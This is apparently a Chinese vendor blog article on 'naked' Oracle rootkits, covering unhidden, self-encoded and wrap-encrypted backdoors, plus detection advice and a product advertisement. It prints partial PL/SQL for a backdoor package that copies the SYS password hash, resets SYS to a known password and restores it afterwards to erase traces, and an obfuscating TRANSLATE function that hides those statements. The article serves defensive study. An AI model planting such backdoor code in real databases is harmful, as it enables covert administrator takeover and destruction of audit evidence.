前言
各位小伙伴們���,今天咱們接著聊Oracle Rootkits話題��。上次主要給各位介紹了數據庫后門和Rootkits技術給數據庫帶來的威脅和風險��。由于篇幅所限未能深入分析數據庫后門和Rootkits所采用的具體技術�����。本文則詳細展開介紹Oracle Rootkits技術的第一類(裸奔)�,旨在幫助小伙伴們掌握此類后門Rootkits技術的特點后�����,更好地保護自己的數據庫安全����。如果有小伙伴們沒有事先了解數據庫后門和Rootkits,可以先閱讀一文做個大致了解����。
為什么我們把今天的講題命名為裸奔呢��?因為和其他三類技術類型比起來����,這類用來隱藏數據庫后門的Rootkits技術基本不具備特別的隱蔽技巧�����,甚至有時候不加任何偽裝就可以把后門植入到數據庫中��,完全是鉆了數據庫安全檢查產品或數據庫運維人員疏忽的空子而得以”存活”��。受限于攻擊者能拿到的權限和攻擊者自身水平�����,大部分數據庫后門�,就是采用系列三中介紹的第一類Rootkits技術。這類Oracle Rootkits技術又可以細分成三種類型:
第一種是不做任何隱藏的數據庫后門�����;
第二種是通過編碼加密的數據庫后門���;
第三種是通過Oracle warp整體加密的數據庫后門�。
由于每種使用了不同的隱藏技術所以在找到這些威脅的時候所采用的技術手段也存在很大差異。目前�����,安華金和數據庫攻防實驗室已經發(fā)現90多例使用此類技術的數據庫后門�����。比較典型的案例之一是在去年年底爆發(fā)的針對Oracle的比特幣勒索事件����,其所攻擊的數據庫后門就是采用此類技術中的第三種warp加密得以隱身�����,具體請參見《Oracle比特幣勒索攻擊檢測及修復工具》�。
第一種:不隱身數據庫后門
數據庫中一個DBA用戶、一個函數���、一個存儲過程�、一個觸發(fā)器�,或者幾個之間相互配合都可以形成數據庫后門。為了讓大家更直觀的理解����,下面所舉數據庫漏洞的例子均采用數據庫存儲過程型做代表�����。
當黑客在入侵過程中獲得數據庫的DBA權限后�,就可以針對數據庫部署后門程序��。這種后門存儲過程為了幫助黑客達成某種目的�����,必定會對某些關鍵表�����,或者高危權限進行操作�。例如,下圖的后門dbms_xml通過調用lock和unlock來控制SYS用戶的密碼���,當黑客操作unlock的時候��,首先創(chuàng)建表syspa1用于存儲從sys.user$中拿到的SYS用戶的密碼�。然后修改SYS密碼為hack11hack'�����。登錄SYS用戶后,有目的地入侵有價值的數據庫后����,利用SYS用戶權限清理數據庫的日志信息。最后使用lock把SYS用戶的密碼還原回去����,并刪除中間生成的表syspa1�����。黑客利用這個存儲過程既能達到自己的目的����,又能巧妙地隱藏SYS密碼曾被修改的記錄,并將SYS恢復到修改前的狀態(tài)��,消除數據庫被入侵過的痕跡�����。
……..
CREATE OR REPLACE PACKAGE BODY dbms_xml AS
PROCEDURE parse (string IN VARCHAR2) IS
var1 VARCHAR2 (100);
BEGIN
IF string = 'unlock' THEN
SELECT PASSWORD INTO var1 FROM sys.user$ WHERE name = 'SYS'; --11
EXECUTE IMMEDIATE 'create table syspa1 (col1 varchar2(100))';
EXECUTE IMMEDIATE 'insert into syspa1 values ('''||var1||''')';
COMMIT;
EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY hack11hack';
END IF;
IF string = 'lock' THEN
EXECUTE IMMEDIATE 'SELECT col1 FROM syspa1 WHERE ROWNUM=1' INTO var1;
EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY VALUES '''||var1||'''';
EXECUTE IMMEDIATE 'DROP TABLE syspa1';
END IF;
……….
第二種:自編碼加密數據庫后門
第一種數據庫后門沒采用任何隱身方法��,因此�,借助工具或者數據庫管理員手工排查很快就可以將之揪出�����,并予以解決�。黑客對數據庫后門施以隱身技術���,最常見的是采取自編碼加密的方式。利用編碼隱藏數據庫后門存在的特征�,躲避數據庫安全工具或數據庫管理員的定期檢查。下面仍為后門dbms_xml�,但在真正執(zhí)行關鍵語句前,黑客加入了一段字符串置換的邏輯�����,通過這種手段把關鍵操作隱藏起來,下面我們用TRANSLATE來做編碼置換:
………
FUNCTION conv (input IN VARCHAR2)
RETURN VARCHAR2
IS
x VARCHAR2 (300);
BEGIN
x :=
TRANSLATE (input,
'ZYXWVUTSRQPOMNLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba0987654321 ',
‘1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
);
RETURN x;
EXCEPTION
WHEN OTHERS
THEN
RETURN NULL;
END conv;
……….
函數conv 可以通過黑客自定義的映射表�����,把SELECT PASSWORD FROM sys.user$ WHERE name = 'SYS'這句對敏感表sys.user$和敏感字段PASSWORD 的高危查詢就變成了7kdkm6Z0o773a8lZj8acZwqw.uwKx$Z3hk8kZBOCKZ=Z''717�。這種方式的Rootkit通過編碼的方式把數據庫后門隱藏起來��,躲避安全工具的檢查和數據庫管理員的偵測�����。
……….
EXECUTE IMMEDIATE conv ('7kdkm6Z0o773a8lZj8acZwqw.uwKx$Z3hk8kZBOCKZ=Z''717''')INTO var1;
EXECUTE IMMEDIATE conv ('NxKOvKZvOMDKZwqwzOYZ(NADYZtOxNHOxX(YPP))');
EXECUTE IMMEDIATE conv ('GBwKxvZGBvAZwqwzOYZtODuKwZ(''') || var1 || ''')';
COMMIT;
………
黑客在調用存儲過程時���,內部調用函數conv對編碼的字符串作出還原的動作����,黑客利用該方式消除了第一種方式中后門可能被發(fā)現的風險�。這種方法比第一種更加隱蔽���,且危險�。
第三種:Oracle warp整體加密數據庫后門
雖然第二種方法已經成功隱掉了數據庫后門的特征�,卻引入了新的暴露點����,因為加密或編碼函數本身可能會暴露一切�。而且解密函數會直接出現在數據中�,解密后數據庫后門也就難以隱藏了��。
于是���,很多黑客開始采用warp(筆者不太清楚其他數據庫是否存在類似Oracle的warp)對數據庫后門進行加密����。Warp的特點有二:1.Oracle只提供了warp加密并未提供warp解密����,給破解后的應對帶來一定技術難度;2.warp加密的存儲過程或函數在Oracle運行態(tài)中自動解密并執(zhí)行��,無需引入其他變量,這就增加了后門被發(fā)現的風險����。dbms_xml用warp加密見下圖所示:
解決方案
看完上述的后門隱身技術����,很多小伙伴可能會疑惑:所謂“裸奔”級別的后門隱身技術,哪有想象中那樣簡單啊���。特別是第二�����、第三種方法�����,找出被它們隱藏的后門還是困難重重的��。別急���,等你看完安華金和數據庫攻防實驗室給大家支的招�,你就覺得����,這個技術也不過如此。
自己動手豐衣足食
前述第一種方式相對最簡單�����,這種方式的數據庫后門沒有使用任何隱身技術���,想抓捕這種方式下的數據庫后門�,關鍵是具備對“三敏感”的捕獲能力。
“三敏感”即敏感表����、敏感字段和敏感操作的簡稱。通過sys.source$可以查詢哪些存儲過程或函數中存在調用“三敏感”的地方�����,例如����,可以使用類似下方的檢查項來檢查是否存在修改密碼的行為:
select ……… SQLTEXT from dba_source a,dba_procedures b……
where lower(text) like '%grant%to%identified%by%'……
and lower(text) not like '% wrapped%'………..
……..
把握好“三敏感”的檢查原則,應該就可以揪出潛伏在數據庫中的第一種數據庫后門�����。而破除第二�����、第三種后門的隱身技術����,則需要破除它們自身所攜帶的編碼/加密保護�����。
第二種除了檢查“三敏感”的操作,還需要檢查哪些函數或存儲過程等使用了解密函數或者置換函數��。先發(fā)現使用這些加解密或編碼的函數����,然后再檢查哪些存儲過程調用過該函數,最終安排人力進行一一排查����。
第三種由于warp加密缺乏公開解密辦法,是相對最難清除的一種后門隱身技術���,其難點不但在于繁重的人力工作���,還需要掌握warp解密的算法。Warp解密算法相對較為復雜��,有很多細節(jié)��,本文暫不展開說明����。
成熟產品助力解決
尋找數據庫中潛伏的后門��,需要交給專業(yè)的公司。安華金和的數據庫漏洞掃描產品,涵蓋上述三種后門隱身的破解能力��,能破解后門使用的上述隱身技術���,通過特征揪出潛伏在數據庫中的安全威脅��,為數據庫安全保駕護航。
產品咨詢:4000 258 365 
